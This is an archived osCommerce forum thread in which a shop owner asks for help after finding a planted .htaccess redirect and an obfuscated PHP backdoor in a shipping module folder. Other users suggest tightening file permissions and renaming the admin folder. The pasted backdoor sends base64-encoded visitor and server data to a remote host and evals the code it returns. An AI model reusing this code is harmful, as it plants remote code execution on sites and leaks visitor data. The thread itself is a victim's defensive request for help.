Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Site hacked?!? Please help


dubz99

Recommended Posts

Today I discovered that our shipping/payment modules were not working properly. After going into admin, i discovered that no shipping or payment methods were installed!

 

Finally I found two files in the /catalog/includes/modules/shipping/ The first was a .htaccess redirect with the code below.

 

Options -MultiViews
ErrorDocument 404 //catalog/includes/modules/shipping/70884.php

 

and the second had the following code in the above mentioned file.

 

Can some of you php gurus pick apart the below and tell me what the file was doing?? Many thanks and much appreciated!!!

 

<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cGhwZmVlZC5ydQ==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="2b4745515d3e75fee07f3ef64d4f2968") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);}; ?>

Link to comment
Share on other sites

This probably happened because you have folders with 777 permissions.

 

Check all your folders (even in the Admin) for bogus PHP files.

 

The names are probably all numbers like the example you posted:

 

70884.php

 

But there could be others.

 

If it's the same one that got me, and it looks that way, it's a "pay per click" scam.

 

They hack your site with these bogus files then seed search engines to go there, and just sit back and collect for every click.

 

Check your file/folder permissions.

 

FILE permissions shouldn't be higher than 644

 

FOLDER permissions shouldn't be higher than 755

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Jim,

 

I did find similar files in different areas and have deleted them

 

I have changed permissions as stated in you last post but now I am getting a 403 forbidden error on admin and front end - every page

 

Any help would be appreciated!

 

Thanks Again

dubz

Link to comment
Share on other sites

My bad it seems I made the folders 744 rather than 755.

 

All is good now, so how do you think these files were put here? What are the possibilities? I would like to make sure this doesn't happen again and I would appreciate your wealth of knowledge.

 

dubz

Link to comment
Share on other sites

It's a web-bot.

 

Looking at the timestamps on files I've seen it has to be.

 

No one could upload files that fast manually.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

Well that makes me feel a little better about it-

 

As always thanks for your help!

 

dubz

It's a web-bot.

 

Looking at the timestamps on files I've seen it has to be.

 

No one could upload files that fast manually.

Link to comment
Share on other sites

This probably happened because you have folders with 777 permissions.

No way, this is happen only cause the server was setup incorrectly with security holes - it is my opinion as linux system administrator

Please read this line: Do you want to find all the answers to your questions? click here. As for contribution database it's located here!

8 people out of 10 don't bother to read installation manuals. I can recommend: if you can't read the installation manual, don't bother to install any contribution yourself.

Before installing contribution or editing/updating/deleting any files, do the full backup, it will save to you & everyone here on the forum time to fix your issues.

Any issues with oscommerce, I am here to help you.

Link to comment
Share on other sites

this is happen only cause the server was setup incorrectly with security holes

That may be true, but after changing folder permissions to 755 it doesn't happen.

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

That may be true, but after changing folder permissions to 755 it doesn't happen.

 

Had a lot of problem with hackers a few months ago so I changed the name of the admin directory to XXXXX you have to adjust the admin/include/configure.php file to suit the new name solved my problem

John

To improve is to change; to be perfect is to change often.

 

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...